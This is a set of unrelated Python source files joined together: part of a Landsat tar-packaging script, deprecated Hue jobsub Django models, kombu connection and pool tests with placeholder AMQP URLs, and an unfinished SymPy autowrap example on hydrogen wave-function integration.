block_size=(block_size, block_size),
)
else:
raise ValueError(
f"Expected either tar.gz or a dataset folder. " f"Got: {repr(path)}"
)
if not success:
failures += 1
if total > 1:
_LOG.info(
"node.finish",
host=socket.getfqdn(),
total_count=total,
failure_count=failures,
)
sys.exit(failures)
def please_remove(path: Path, excluding: Path):
"""
Delete all of path, excluding the given path.
"""
if path.absolute() == excluding.absolute():
return
if path.is_dir():
for p in path.iterdir():
please_remove(p, excluding)
with suppress(OSError):
path.rmdir()
else:
path.unlink()
def _format_exception(e: BaseException):
"""
Shamelessly stolen from stdlib's logging module.
"""
with io.StringIO() as sio:
traceback.print_exception(e.__class__, e, e.__traceback__, None, sio)
return sio.getvalue().strip()
def _output_tar_path(base_output, input_path):
if base_output:
out_path = _calculate_out_base_path(base_output, input_path)
else:
out_path = input_path
# Remove .gz suffix
name = out_path.stem
if not name.endswith(".tar"):
raise RuntimeError(f"Expected path to end in .tar.gz, got: {out_path}")
return out_path.with_name(name)
def _output_tar_path_from_directory(base_output, input_path):
mtl_files = list(input_path.glob("*_MTL.txt"))
if not mtl_files:
raise ValueError(f"Dataset has no mtl: {input_path}")
if len(mtl_files) > 1:
_LOG.warn("multiple.mtl.files", in_path=input_path)
mtl_file = mtl_files[0]
dataset_name = mtl_file.name.replace("_MTL.txt", "")
if base_output:
return _calculate_out_base_path(base_output, input_path) / f"{dataset_name}.tar"
else:
return input_path / f"{dataset_name}.tar"
def _calculate_out_base_path(out_base: Path, path: Path) -> Path:
if "USGS" not in path.parts:
raise ValueError(
"Expected AODH input path structure, "
"eg: /AODH/USGS/L1/Landsat/C1/092_091/LT50920911991126/LT05_L1GS_092091_19910506_20170126_01_T2.tar.gz"
)
# The directory structure after the "USGS" folder is recreated onto the output base folder.
return out_base.joinpath(*path.parts[path.parts.index("USGS") + 1 : -1], path.name)
if __name__ == "__main__":
main()
| |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from django.db import models
from django.core import urlresolvers
from django.contrib.auth.models import User
from desktop.lib.parameterization import find_parameters, bind_parameters
from django.utils.translation import ugettext_lazy as _
LOG = logging.getLogger(__name__)
class JobDesign(models.Model):
"""
DEPRECATED!!!
This is the old Hue 1.x job design model. In Hue 2, the design is modeled
after Oozie workflows.
Contains CMS information for "job designs".
"""
owner = models.ForeignKey(User)
name = models.CharField(max_length=40)
description = models.CharField(max_length=1024)
last_modified = models.DateTimeField(auto_now=True)
# Type corresponds to a JobSubForm that gets registered in jobsub.forms.interface.registry
type = models.CharField(max_length=128)
# Data is serialized via JobSubFormInterface.serialize_[to|from]_string
data = models.TextField()
def edit_url(self):
return urlresolvers.reverse("jobsub.views.edit_design", kwargs=dict(id=self.id))
def clone_url(self):
return urlresolvers.reverse("jobsub.views.clone_design", kwargs=dict(id=self.id))
def delete_url(self):
return urlresolvers.reverse("jobsub.views.delete_design", kwargs=dict(id=self.id))
def submit_url(self):
return urlresolvers.reverse("jobsub.views.submit_design", kwargs=dict(id=self.id))
def clone(self):
clone_kwargs = dict([(field.name, getattr(self, field.name)) for field in self._meta.fields if field.name != 'id']);
return self.__class__.objects.create(**clone_kwargs)
def to_jsonable(self):
return {
'owner': self.owner.username,
'name': self.name,
'last_modified': str(self.last_modified),
'type': self.type,
'data': repr(self.data)
}
class CheckForSetup(models.Model):
"""
A model which should have at most one row, indicating
whether jobsub_setup has run succesfully.
"""
# Pre-Hue2 setup
setup_run = models.BooleanField()
# What kind of setup have we done?
setup_level = models.IntegerField(default=0)
################################## New Models ################################
PATH_MAX = 512
class OozieAction(models.Model):
"""
DEPRECATED!!!
This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
Oozie models are used.
The OozieAction model is an abstract base class. All concrete actions
derive from it. And it provides something for the OozieDesign to
reference. See
https://docs.djangoproject.com/en/dev/topics/db/models/#multi-table-inheritance
"""
PARAM_FIELDS = ( ) # Nothing is parameterized by default
# This allows the code to easily figure out which subclass to access
action_type = models.CharField(max_length=64, blank=False)
def find_parameters(self):
"""Return a list of parameters in the various fields"""
return find_parameters(self, self.PARAM_FIELDS)
def bind_parameters(self, mapping):
"""
Change the values of the model object by replacing the param variables
with actual values.
Mapping is a dictionary of variable to value.
"""
# We're going to alter this object. Disallow saving (for models).
self.save = None
bind_parameters(self, mapping, self.PARAM_FIELDS)
class OozieDesign(models.Model):
"""
DEPRECATED!!!
This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
Oozie models are used.
Contains information about all (Oozie) designs. Specific action info are
stored in the Oozie*Action models.
"""
# Generic stuff
owner = models.ForeignKey(User)
name = models.CharField(max_length=64, blank=False,
help_text=_('Name of the design, which must be unique per user.'))
description = models.CharField(max_length=1024, blank=True)
last_modified = models.DateTimeField(auto_now=True)
# Action. Avoid using `root_action' directly, because it only gives you the
# intermediate table (i.e. OozieAction). You want to use `get_root_action()'
# most of the time.
root_action = models.ForeignKey(OozieAction)
def get_root_action(self):
"""Return the concrete action object, not just a generic OozieAction"""
root = self.root_action
if root is None:
return None
if root.action_type == OozieMapreduceAction.ACTION_TYPE:
return root.ooziemapreduceaction
elif root.action_type == OozieStreamingAction.ACTION_TYPE:
return root.ooziestreamingaction
elif root.action_type == OozieJavaAction.ACTION_TYPE:
return root.ooziejavaaction
LOG.error("Oozie action type '%s' is not valid (jobsub_oozieaction.id %s)"
% (root.action_type, root.id))
return None
def clone(self, new_owner=None):
"""Return a newly saved instance."""
action_copy = self.get_root_action()
action_copy.pk = None # Need a new OozieAction (superclass instance)
action_copy.id = None # Need a new action instance as well
action_copy.save()
copy = self
copy.pk = None
copy.root_action = action_copy
if new_owner is not None:
copy.owner = new_owner
copy.save()
return copy
def find_parameters(self):
return self.get_root_action().find_parameters()
def bind_parameters(self, mapping):
return self.get_root_action().bind_parameters(mapping)
class OozieMapreduceAction(OozieAction):
"""
DEPRECATED!!!
This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
Oozie models are used.
Stores MR actions
"""
PARAM_FIELDS = ('files', 'archives', 'job_properties', 'jar_path')
ACTION_TYPE = "mapreduce"
# For the distributed cache. JSON arrays.
files = models.CharField(max_length=PATH_MAX, default="[]",
help_text=_('List of paths to files to be added to the distributed cache.'))
archives = models.CharField(max_length=PATH_MAX, default="[]",
help_text=_('List of paths to archives to be added to the distributed cache.'))
# For the job configuration. JSON dict. Required (e.g. mapred.mapper.class).
job_properties = models.TextField(default="[]")
# Location of the jar in hdfs
jar_path = models.CharField(max_length=PATH_MAX,
help_text=_('Path to jar files on HDFS.'))
class OozieStreamingAction(OozieAction):
"""
DEPRECATED!!!
This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
Oozie models are used.
This is still an MR action from Oozie's perspective. But the data modeling is
slightly different.
Note that we don't inherit from OozieMapreduceAction because we want the data
to be in one place.
"""
PARAM_FIELDS = ('files', 'archives', 'job_properties', 'mapper', 'reducer')
ACTION_TYPE = "streaming"
# For the distributed cache. JSON arrays.
files = models.CharField(max_length=PATH_MAX, default="[]")
archives = models.CharField(max_length=PATH_MAX, default="[]")
# For the job configuration. JSON dict. Required (e.g. mapred.input.dir).
job_properties = models.TextField(default="[]")
# Scripts/commands (paths in hdfs)
mapper = models.CharField(max_length=PATH_MAX, blank=False)
reducer = models.CharField(max_length=PATH_MAX, blank=False)
class OozieJavaAction(OozieAction):
"""
DEPRECATED!!!
This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
Oozie models are used.
Definition of Java actions
"""
PARAM_FIELDS = ('files', 'archives', 'jar_path', 'main_class', 'args',
'java_opts', 'job_properties')
ACTION_TYPE = "java"
# For the distributed cache. JSON arrays.
files = models.CharField(max_length=PATH_MAX, default="[]",
help_text=_('List of paths to files to be added to the distributed cache.'))
archives = models.CharField(max_length=PATH_MAX, default="[]",
help_text=_('List of paths to archives to be added to the distributed cache.'))
# Location of the jar in hdfs
jar_path = models.CharField(max_length=PATH_MAX, blank=False)
main_class = models.CharField(max_length=256, blank=False)
args = models.TextField(blank=True)
java_opts = models.CharField(max_length=256, blank=True)
# For the job configuration. JSON dict.
job_properties = models.TextField(default="[]")
class JobHistory(models.Model):
"""
DEPRECATED!!!
This is the old Hue 2.0/2.1 job design model. In Hue 2.2 and newer,
Oozie models are used.
Contains informatin on submitted jobs/workflows.
"""
owner = models.ForeignKey(User)
submission_date = models.DateTimeField(auto_now=True)
job_id = models.CharField(max_length=128)
design = models.ForeignKey(OozieDesign)
| |
from __future__ import absolute_import
import pickle
import socket
from copy import copy
from kombu import Connection, Consumer, Producer, parse_url
from kombu.connection import Resource
from kombu.five import items, range
from .case import Case, Mock, SkipTest, patch, skip_if_not_module
from .mocks import Transport
class test_connection_utils(Case):
def setup(self):
self.url = 'amqp://user:pass@localhost:5672/my/vhost'
self.nopass = 'amqp://user:**@localhost:5672/my/vhost'
self.expected = {
'transport': 'amqp',
'userid': 'user',
'password': 'pass',
'hostname': 'localhost',
'port': 5672,
'virtual_host': 'my/vhost',
}
def test_parse_url(self):
result = parse_url(self.url)
self.assertDictEqual(result, self.expected)
def test_parse_generated_as_uri(self):
conn = Connection(self.url)
info = conn.info()
for k, v in self.expected.items():
self.assertEqual(info[k], v)
# by default almost the same- no password
self.assertEqual(conn.as_uri(), self.nopass)
self.assertEqual(conn.as_uri(include_password=True), self.url)
@skip_if_not_module('redis')
def test_as_uri_when_prefix(self):
conn = Connection('redis+socket:///var/spool/x/y/z/redis.sock')
self.assertEqual(
conn.as_uri(), 'redis+socket:///var/spool/x/y/z/redis.sock',
)
@skip_if_not_module('pymongo')
def test_as_uri_when_mongodb(self):
x = Connection('mongodb://localhost')
self.assertTrue(x.as_uri())
def test_bogus_scheme(self):
with self.assertRaises(KeyError):
Connection('bogus://localhost:7421').transport
def assert_info(self, conn, **fields):
info = conn.info()
for field, expected in items(fields):
self.assertEqual(info[field], expected)
def test_rabbitmq_example_urls(self):
# see Appendix A of http://www.rabbitmq.com/uri-spec.html
self.assert_info(
Connection('amqp://user:pass@host:10000/vhost'),
userid='user', password='pass', hostname='host',
port=10000, virtual_host='vhost',
)
self.assert_info(
Connection('amqp://user%61:%61pass@ho%61st:10000/v%2fhost'),
userid='usera', password='apass', hostname='hoast',
port=10000, virtual_host='v/host',
)
self.assert_info(
Connection('amqp://'),
userid='guest', password='guest', hostname='localhost',
port=5672, virtual_host='/',
)
self.assert_info(
Connection('amqp://:@/'),
userid='guest', password='guest', hostname='localhost',
port=5672, virtual_host='/',
)
self.assert_info(
Connection('amqp://user@/'),
userid='user', password='guest', hostname='localhost',
port=5672, virtual_host='/',
)
self.assert_info(
Connection('amqp://user:pass@/'),
userid='user', password='pass', hostname='localhost',
port=5672, virtual_host='/',
)
self.assert_info(
Connection('amqp://host'),
userid='guest', password='guest', hostname='host',
port=5672, virtual_host='/',
)
self.assert_info(
Connection('amqp://:10000'),
userid='guest', password='guest', hostname='localhost',
port=10000, virtual_host='/',
)
self.assert_info(
Connection('amqp:///vhost'),
userid='guest', password='guest', hostname='localhost',
port=5672, virtual_host='vhost',
)
self.assert_info(
Connection('amqp://host/'),
userid='guest', password='guest', hostname='host',
port=5672, virtual_host='/',
)
self.assert_info(
Connection('amqp://host/%2f'),
userid='guest', password='guest', hostname='host',
port=5672, virtual_host='/',
)
def test_url_IPV6(self):
raise SkipTest("urllib can't parse ipv6 urls")
self.assert_info(
Connection('amqp://[::1]'),
userid='guest', password='guest', hostname='[::1]',
port=5672, virtual_host='/',
)
class test_Connection(Case):
def setup(self):
self.conn = Connection(port=5672, transport=Transport)
def test_establish_connection(self):
conn = self.conn
conn.connect()
self.assertTrue(conn.connection.connected)
self.assertEqual(conn.host, 'localhost:5672')
channel = conn.channel()
self.assertTrue(channel.open)
self.assertEqual(conn.drain_events(), 'event')
_connection = conn.connection
conn.close()
self.assertFalse(_connection.connected)
self.assertIsInstance(conn.transport, Transport)
def test_multiple_urls(self):
conn1 = Connection('amqp://foo;amqp://bar')
self.assertEqual(conn1.hostname, 'foo')
self.assertListEqual(conn1.alt, ['amqp://foo', 'amqp://bar'])
conn2 = Connection(['amqp://foo', 'amqp://bar'])
self.assertEqual(conn2.hostname, 'foo')
self.assertListEqual(conn2.alt, ['amqp://foo', 'amqp://bar'])
def test_collect(self):
connection = Connection('memory://')
trans = connection._transport = Mock(name='transport')
_collect = trans._collect = Mock(name='transport._collect')
_close = connection._close = Mock(name='connection._close')
connection.declared_entities = Mock(name='decl_entities')
uconn = connection._connection = Mock(name='_connection')
connection.collect()
self.assertFalse(_close.called)
_collect.assert_called_with(uconn)
connection.declared_entities.clear.assert_called_with()
self.assertIsNone(trans.client)
self.assertIsNone(connection._transport)
self.assertIsNone(connection._connection)
def test_collect_no_transport(self):
connection = Connection('memory://')
connection._transport = None
connection._do_close_self = Mock()
connection._do_close_transport = Mock()
connection.collect()
connection._do_close_self.assert_called_with()
connection._do_close_transport.assert_called_with()
connection._do_close_self.side_effect = socket.timeout()
connection.collect()
def test_collect_transport_gone(self):
connection = Connection('memory://')
uconn = connection._connection = Mock(name='conn._conn')
trans = connection._transport = Mock(name='transport')
collect = trans._collect = Mock(name='transport._collect')
def se(conn):
connection._transport = None
collect.side_effect = se
connection.collect()
collect.assert_called_with(uconn)
self.assertIsNone(connection._transport)
def test_uri_passthrough(self):
transport = Mock(name='transport')
with patch('kombu.connection.get_transport_cls') as gtc:
gtc.return_value = transport
transport.can_parse_url = True
with patch('kombu.connection.parse_url') as parse_url:
c = Connection('foo+mysql://some_host')
self.assertEqual(c.transport_cls, 'foo')
self.assertFalse(parse_url.called)
self.assertEqual(c.hostname, 'mysql://some_host')
self.assertTrue(c.as_uri().startswith('foo+'))
with patch('kombu.connection.parse_url') as parse_url:
c = Connection('mysql://some_host', transport='foo')
self.assertEqual(c.transport_cls, 'foo')
self.assertFalse(parse_url.called)
self.assertEqual(c.hostname, 'mysql://some_host')
c = Connection('pyamqp+sqlite://some_host')
self.assertTrue(c.as_uri().startswith('pyamqp+'))
def test_default_ensure_callback(self):
with patch('kombu.connection.logger') as logger:
c = Connection(transport=Mock)
c._default_ensure_callback(KeyError(), 3)
self.assertTrue(logger.error.called)
def test_ensure_connection_on_error(self):
c = Connection('amqp://A;amqp://B')
with patch('kombu.connection.retry_over_time') as rot:
c.ensure_connection()
self.assertTrue(rot.called)
args = rot.call_args[0]
cb = args[4]
intervals = iter([1, 2, 3, 4, 5])
self.assertEqual(cb(KeyError(), intervals, 0), 0)
self.assertEqual(cb(KeyError(), intervals, 1), 1)
self.assertEqual(cb(KeyError(), intervals, 2), 0)
self.assertEqual(cb(KeyError(), intervals, 3), 2)
self.assertEqual(cb(KeyError(), intervals, 4), 0)
self.assertEqual(cb(KeyError(), intervals, 5), 3)
self.assertEqual(cb(KeyError(), intervals, 6), 0)
self.assertEqual(cb(KeyError(), intervals, 7), 4)
errback = Mock()
c.ensure_connection(errback=errback)
args = rot.call_args[0]
cb = args[4]
self.assertEqual(cb(KeyError(), intervals, 0), 0)
self.assertTrue(errback.called)
def test_supports_heartbeats(self):
c = Connection(transport=Mock)
c.transport.implements.heartbeats = False
self.assertFalse(c.supports_heartbeats)
def test_is_evented(self):
c = Connection(transport=Mock)
c.transport.implements.async = False
self.assertFalse(c.is_evented)
def test_register_with_event_loop(self):
c = Connection(transport=Mock)
loop = Mock(name='loop')
c.register_with_event_loop(loop)
c.transport.register_with_event_loop.assert_called_with(
c.connection, loop,
)
def test_manager(self):
c = Connection(transport=Mock)
self.assertIs(c.manager, c.transport.manager)
def test_copy(self):
c = Connection('amqp://example.com')
self.assertEqual(copy(c).info(), c.info())
def test_copy_multiples(self):
c = Connection('amqp://A.example.com;amqp://B.example.com')
self.assertTrue(c.alt)
d = copy(c)
self.assertEqual(d.alt, c.alt)
def test_switch(self):
c = Connection('amqp://foo')
c._closed = True
c.switch('redis://example.com//3')
self.assertFalse(c._closed)
self.assertEqual(c.hostname, 'example.com')
self.assertEqual(c.transport_cls, 'redis')
self.assertEqual(c.virtual_host, '/3')
def test_maybe_switch_next(self):
c = Connection('amqp://foo;redis://example.com//3')
c.maybe_switch_next()
self.assertFalse(c._closed)
self.assertEqual(c.hostname, 'example.com')
self.assertEqual(c.transport_cls, 'redis')
self.assertEqual(c.virtual_host, '/3')
def test_maybe_switch_next_no_cycle(self):
c = Connection('amqp://foo')
c.maybe_switch_next()
self.assertFalse(c._closed)
self.assertEqual(c.hostname, 'foo')
self.assertIn(c.transport_cls, ('librabbitmq', 'pyamqp', 'amqp'))
def test_heartbeat_check(self):
c = Connection(transport=Transport)
c.transport.heartbeat_check = Mock()
c.heartbeat_check(3)
c.transport.heartbeat_check.assert_called_with(c.connection, rate=3)
def test_completes_cycle_no_cycle(self):
c = Connection('amqp://')
self.assertTrue(c.completes_cycle(0))
self.assertTrue(c.completes_cycle(1))
def test_completes_cycle(self):
c = Connection('amqp://a;amqp://b;amqp://c')
self.assertFalse(c.completes_cycle(0))
self.assertFalse(c.completes_cycle(1))
self.assertTrue(c.completes_cycle(2))
def test__enter____exit__(self):
conn = self.conn
context = conn.__enter__()
self.assertIs(context, conn)
conn.connect()
self.assertTrue(conn.connection.connected)
conn.__exit__()
self.assertIsNone(conn.connection)
conn.close() # again
def test_close_survives_connerror(self):
class _CustomError(Exception):
pass
class MyTransport(Transport):
connection_errors = (_CustomError,)
def close_connection(self, connection):
raise _CustomError('foo')
conn = Connection(transport=MyTransport)
conn.connect()
conn.close()
self.assertTrue(conn._closed)
def test_close_when_default_channel(self):
conn = self.conn
conn._default_channel = Mock()
conn._close()
conn._default_channel.close.assert_called_with()
def test_close_when_default_channel_close_raises(self):
class Conn(Connection):
@property
def connection_errors(self):
return (KeyError,)
conn = Conn('memory://')
conn._default_channel = Mock()
conn._default_channel.close.side_effect = KeyError()
conn._close()
conn._default_channel.close.assert_called_with()
def test_revive_when_default_channel(self):
conn = self.conn
defchan = conn._default_channel = Mock()
conn.revive(Mock())
defchan.close.assert_called_with()
self.assertIsNone(conn._default_channel)
def test_ensure_connection(self):
self.assertTrue(self.conn.ensure_connection())
def test_ensure_success(self):
def publish():
return 'foobar'
ensured = self.conn.ensure(None, publish)
self.assertEqual(ensured(), 'foobar')
def test_ensure_failure(self):
class _CustomError(Exception):
pass
def publish():
raise _CustomError('bar')
ensured = self.conn.ensure(None, publish)
with self.assertRaises(_CustomError):
ensured()
def test_ensure_connection_failure(self):
class _ConnectionError(Exception):
pass
def publish():
raise _ConnectionError('failed connection')
self.conn.transport.connection_errors = (_ConnectionError,)
ensured = self.conn.ensure(self.conn, publish)
with self.assertRaises(_ConnectionError):
ensured()
def test_autoretry(self):
myfun = Mock()
self.conn.transport.connection_errors = (KeyError,)
def on_call(*args, **kwargs):
myfun.side_effect = None
raise KeyError('foo')
myfun.side_effect = on_call
insured = self.conn.autoretry(myfun)
insured()
self.assertTrue(myfun.called)
def test_SimpleQueue(self):
conn = self.conn
q = conn.SimpleQueue('foo')
self.assertIs(q.channel, conn.default_channel)
chan = conn.channel()
q2 = conn.SimpleQueue('foo', channel=chan)
self.assertIs(q2.channel, chan)
def test_SimpleBuffer(self):
conn = self.conn
q = conn.SimpleBuffer('foo')
self.assertIs(q.channel, conn.default_channel)
chan = conn.channel()
q2 = conn.SimpleBuffer('foo', channel=chan)
self.assertIs(q2.channel, chan)
def test_Producer(self):
conn = self.conn
self.assertIsInstance(conn.Producer(), Producer)
self.assertIsInstance(conn.Producer(conn.default_channel), Producer)
def test_Consumer(self):
conn = self.conn
self.assertIsInstance(conn.Consumer(queues=[]), Consumer)
self.assertIsInstance(conn.Consumer(queues=[],
channel=conn.default_channel), Consumer)
def test__repr__(self):
self.assertTrue(repr(self.conn))
def test__reduce__(self):
x = pickle.loads(pickle.dumps(self.conn))
self.assertDictEqual(x.info(), self.conn.info())
def test_channel_errors(self):
class MyTransport(Transport):
channel_errors = (KeyError, ValueError)
conn = Connection(transport=MyTransport)
self.assertTupleEqual(conn.channel_errors, (KeyError, ValueError))
def test_connection_errors(self):
class MyTransport(Transport):
connection_errors = (KeyError, ValueError)
conn = Connection(transport=MyTransport)
self.assertTupleEqual(conn.connection_errors, (KeyError, ValueError))
class test_Connection_with_transport_options(Case):
transport_options = {'pool_recycler': 3600, 'echo': True}
def setup(self):
self.conn = Connection(port=5672, transport=Transport,
transport_options=self.transport_options)
def test_establish_connection(self):
conn = self.conn
self.assertEqual(conn.transport_options, self.transport_options)
class xResource(Resource):
def setup(self):
pass
class ResourceCase(Case):
abstract = True
def create_resource(self, limit):
raise NotImplementedError('subclass responsibility')
def assertState(self, P, avail, dirty):
self.assertEqual(P._resource.qsize(), avail)
self.assertEqual(len(P._dirty), dirty)
def test_setup(self):
if self.abstract:
with self.assertRaises(NotImplementedError):
Resource()
def test_acquire__release(self):
if self.abstract:
return
P = self.create_resource(10)
self.assertState(P, 10, 0)
chans = [P.acquire() for _ in range(10)]
self.assertState(P, 0, 10)
with self.assertRaises(P.LimitExceeded):
P.acquire()
chans.pop().release()
self.assertState(P, 1, 9)
[chan.release() for chan in chans]
self.assertState(P, 10, 0)
def test_acquire_prepare_raises(self):
if self.abstract:
return
P = self.create_resource(10)
self.assertEqual(len(P._resource.queue), 10)
P.prepare = Mock()
P.prepare.side_effect = IOError()
with self.assertRaises(IOError):
P.acquire(block=True)
self.assertEqual(len(P._resource.queue), 10)
def test_acquire_no_limit(self):
if self.abstract:
return
P = self.create_resource(None)
P.acquire().release()
def test_replace_when_limit(self):
if self.abstract:
return
P = self.create_resource(10)
r = P.acquire()
P._dirty = Mock()
P.close_resource = Mock()
P.replace(r)
P._dirty.discard.assert_called_with(r)
P.close_resource.assert_called_with(r)
def test_replace_no_limit(self):
if self.abstract:
return
P = self.create_resource(None)
r = P.acquire()
P._dirty = Mock()
P.close_resource = Mock()
P.replace(r)
self.assertFalse(P._dirty.discard.called)
P.close_resource.assert_called_with(r)
def test_interface_prepare(self):
if not self.abstract:
return
x = xResource()
self.assertEqual(x.prepare(10), 10)
def test_force_close_all_handles_AttributeError(self):
if self.abstract:
return
P = self.create_resource(10)
cr = P.collect_resource = Mock()
cr.side_effect = AttributeError('x')
P.acquire()
self.assertTrue(P._dirty)
P.force_close_all()
def test_force_close_all_no_mutex(self):
if self.abstract:
return
P = self.create_resource(10)
P.close_resource = Mock()
m = P._resource = Mock()
m.mutex = None
m.queue.pop.side_effect = IndexError
P.force_close_all()
def test_add_when_empty(self):
if self.abstract:
return
P = self.create_resource(None)
P._resource.queue.clear()
self.assertFalse(P._resource.queue)
P._add_when_empty()
self.assertTrue(P._resource.queue)
class test_ConnectionPool(ResourceCase):
abstract = False
def create_resource(self, limit):
return Connection(port=5672, transport=Transport).Pool(limit)
def test_setup(self):
P = self.create_resource(10)
q = P._resource.queue
self.assertIsNone(q[0]()._connection)
self.assertIsNone(q[1]()._connection)
self.assertIsNone(q[2]()._connection)
def test_acquire_raises_evaluated(self):
P = self.create_resource(1)
# evaluate the connection first
r = P.acquire()
r.release()
P.prepare = Mock()
P.prepare.side_effect = MemoryError()
P.release = Mock()
with self.assertRaises(MemoryError):
with P.acquire():
assert False
P.release.assert_called_with(r)
def test_release_no__debug(self):
P = self.create_resource(10)
R = Mock()
R._debug.side_effect = AttributeError()
P.release_resource(R)
def test_setup_no_limit(self):
P = self.create_resource(None)
self.assertFalse(P._resource.queue)
self.assertIsNone(P.limit)
def test_prepare_not_callable(self):
P = self.create_resource(None)
conn = Connection('memory://')
self.assertIs(P.prepare(conn), conn)
def test_acquire_channel(self):
P = self.create_resource(10)
with P.acquire_channel() as (conn, channel):
self.assertIs(channel, conn.default_channel)
class test_ChannelPool(ResourceCase):
abstract = False
def create_resource(self, limit):
return Connection(port=5672, transport=Transport).ChannelPool(limit)
def test_setup(self):
P = self.create_resource(10)
q = P._resource.queue
with self.assertRaises(AttributeError):
q[0].basic_consume
def test_setup_no_limit(self):
P = self.create_resource(None)
self.assertFalse(P._resource.queue)
self.assertIsNone(P.limit)
def test_prepare_not_callable(self):
P = self.create_resource(10)
conn = Connection('memory://')
chan = conn.default_channel
self.assertIs(P.prepare(chan), chan)
| |
#!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in SymPy
to create fast, numerical integration routines callable from python. See
in the code for detailed explanations of the various steps. An
autowrapped sympy expression can be significantly faster than what you
would get by applying a sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For
the sake of demonstration, this will be done by setting up a simple
numerical integration scheme as a SymPy expression, and obtain a binary
implementation with autowrap.
You need to have numpy installed to run this example, as well as a
working fortran compiler. If you have pylab installed, you will be
rewarded with a nice plot in the end.
[0]:
http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
from sympy.external import import_module
np = import_module('numpy')
if not np:
sys.exit("Cannot import numpy. Exiting.")
pylab = import_module('pylab', warn_not_installed=True)
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print __doc__
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print "Compiling ufuncs for radial harmonic oscillator solutions"
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
# Reduce the number of operations in the expression by eval to float
expr = expr.evalf(15)
print "The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n)
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
# psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
#
# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular SymPy function using the
# implemented_function utility. This is an extra step needed to avoid
# erronous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n == 0:
print "Setting up binary integrators for the integral:"
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# But it needs to be an operation on indexed objects, so that the code
# generators will recognize it correctly as an array.
# expr = expr.subs(x, A[i])
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
# Lets see how it converges with the grid dimension
print "Checking convergence of integrator for n = %i" % n
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print "grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step))
print "A binary integrator has been set up for each basis state"
print "We will now use them to reconstruct a hydrogen solution."
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print "Calculating coefficients with gridsize = %i and stepsize %f" % (
len(grid), stepsize)
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print "c(%i) = %e" % (n, coeffs[n])
print "Constructing the approximate hydrogen wave"
hydro_approx = 0
